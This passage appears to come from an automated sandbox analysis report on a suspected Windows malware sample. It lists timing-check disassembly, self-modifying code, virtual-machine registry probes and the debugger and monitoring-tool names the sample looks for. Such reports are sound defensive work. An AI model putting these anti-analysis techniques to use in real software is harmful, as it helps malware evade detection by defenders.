Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F09AE second address: 73F09B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, al 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400960 second address: 74009BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, 37FBh 0x0000000f call 00007FE9093D6540h 0x00000014 mov di, si 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FE9093D653Ch 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FE9093D6540h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov bh, ch 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74009BC second address: 7400A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007FE908EE7110h 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE908EE710Ch 0x0000001c and ax, 7668h 0x00000021 jmp 00007FE908EE710Bh 0x00000026 popfd 0x00000027 jmp 00007FE908EE7118h 0x0000002c popad 0x0000002d mov bl, cl 0x0000002f popad 0x00000030 push dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov cx, 0F5Bh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400A4E second address: 7400A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9093D653Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400A77 second address: 7400A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400A7B second address: 7400A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 747096A second address: 74709CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov dx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FE908EE710Dh 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FE908EE710Eh 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FE908EE710Dh 0x00000023 xor cx, FF26h 0x00000028 jmp 00007FE908EE7111h 0x0000002d popfd 0x0000002e jmp 00007FE908EE7110h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74709CE second address: 74709EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, 9F36h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74709EA second address: 74709F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74709F0 second address: 7470A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+10h] 0x0000000b jmp 00007FE9093D6540h 0x00000010 and dl, 00000007h 0x00000013 jmp 00007FE9093D6540h 0x00000018 test eax, eax 0x0000001a jmp 00007FE9093D6540h 0x0000001f je 00007FE9792EBCF8h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FE9093D653Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7470A44 second address: 7470A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7470A48 second address: 7470A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7450E59 second address: 7450E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74604F0 second address: 74604F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74604F4 second address: 74604FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74604FA second address: 7460500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460500 second address: 7460504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460504 second address: 7460518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, edi 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460518 second address: 746051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 746051E second address: 746052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D653Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 746052F second address: 746057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, 772C19CEh 0x00000015 pushfd 0x00000016 jmp 00007FE908EE710Fh 0x0000001b sbb cl, 0000007Eh 0x0000001e jmp 00007FE908EE7119h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 746057E second address: 7460584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460584 second address: 7460588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460588 second address: 74605B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9093D6545h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605B9 second address: 74605E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE908EE7111h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605E7 second address: 74605FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605FA second address: 7460623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2958A60Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE908EE7119h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460623 second address: 7460657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9093D6548h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460657 second address: 746065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 746065B second address: 7460661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460661 second address: 74606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE710Ch 0x00000009 sub cx, 43B8h 0x0000000e jmp 00007FE908EE710Bh 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FE908EE7110h 0x00000023 xor cx, FE18h 0x00000028 jmp 00007FE908EE710Bh 0x0000002d popfd 0x0000002e pushad 0x0000002f movzx ecx, bx 0x00000032 jmp 00007FE908EE710Bh 0x00000037 popad 0x00000038 popad 0x00000039 sub ecx, ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE908EE7112h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74606D4 second address: 74606E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D653Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74606E6 second address: 7460704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE908EE7113h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460704 second address: 74607D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D653Fh 0x00000009 and si, 5A4Eh 0x0000000e jmp 00007FE9093D6549h 0x00000013 popfd 0x00000014 mov ch, E6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], edi 0x0000001c pushad 0x0000001d pushad 0x0000001e movsx edi, cx 0x00000021 push esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 call 00007FE9093D653Ch 0x00000029 pop edx 0x0000002a popad 0x0000002b mov eax, 00000001h 0x00000030 jmp 00007FE9093D653Ch 0x00000035 lock cmpxchg dword ptr [esi], ecx 0x00000039 pushad 0x0000003a mov ax, C57Dh 0x0000003e mov si, 3C79h 0x00000042 popad 0x00000043 mov ecx, eax 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FE9093D6542h 0x0000004c jmp 00007FE9093D6545h 0x00000051 popfd 0x00000052 popad 0x00000053 cmp ecx, 01h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007FE9093D6546h 0x0000005f sbb ecx, 14579118h 0x00000065 jmp 00007FE9093D653Bh 0x0000006a popfd 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74607D1 second address: 74607D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74607D6 second address: 7460851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D6545h 0x00000009 jmp 00007FE9093D653Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FE9792D8306h 0x00000018 jmp 00007FE9093D6545h 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, 77EEh 0x00000025 pushfd 0x00000026 jmp 00007FE9093D653Fh 0x0000002b and cx, B89Eh 0x00000030 jmp 00007FE9093D6549h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460851 second address: 7460861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460861 second address: 7460865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460865 second address: 74608A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 5F25184Fh 0x00000011 pushfd 0x00000012 jmp 00007FE908EE7114h 0x00000017 jmp 00007FE908EE7115h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420419 second address: 742041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742041E second address: 742045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE908EE7119h 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE908EE7118h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742045C second address: 742046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742046B second address: 7420471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420471 second address: 7420475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74201F9 second address: 742020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7110h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742020D second address: 7420246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE9093D6546h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE9093D653Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420246 second address: 7420258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420258 second address: 742025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742025C second address: 7420282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE908EE7119h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420282 second address: 7420288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420288 second address: 742028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742028E second address: 7420292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420292 second address: 74202EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, 10B7h 0x0000000f pushad 0x00000010 jmp 00007FE908EE7119h 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a jmp 00007FE908EE710Eh 0x0000001f and dword ptr [eax], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE908EE7117h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B020E second address: 73B022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B036F second address: 73B0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B0375 second address: 73B03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE9093D6540h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 call 00007FE9093D653Dh 0x00000019 pushfd 0x0000001a jmp 00007FE9093D6540h 0x0000001f sbb si, F468h 0x00000024 jmp 00007FE9093D653Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d jmp 00007FE9093D653Fh 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov ebx, 086EEE86h 0x0000003c movsx edi, si 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B03E8 second address: 73B03EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F28 second address: 73A0F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F2C second address: 73A0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F32 second address: 73A0F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D653Ch 0x00000009 add esi, 61C22F88h 0x0000000f jmp 00007FE9093D653Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE9093D6548h 0x0000001b xor eax, 352C11E8h 0x00000021 jmp 00007FE9093D653Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FE9093D6545h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F9A second address: 73A0FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: F80B41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: F80A77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: 111EB7C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: F7E62A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: 1127495 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSpecial instruction interceptor: First address: 11ACA36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00A19980 rdtsc 0_2_00A19980
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008329FF
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: yqUQPPp0LM.exe, 00000000.00000003.2352649289.0000000006C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: isY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'iL
Source: yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH"?
Source: yqUQPPp0LM.exeBinary or memory string: Hyper-V RAW
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: yqUQPPp0LM.exe, 00000000.00000003.2350886890.0000000001B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
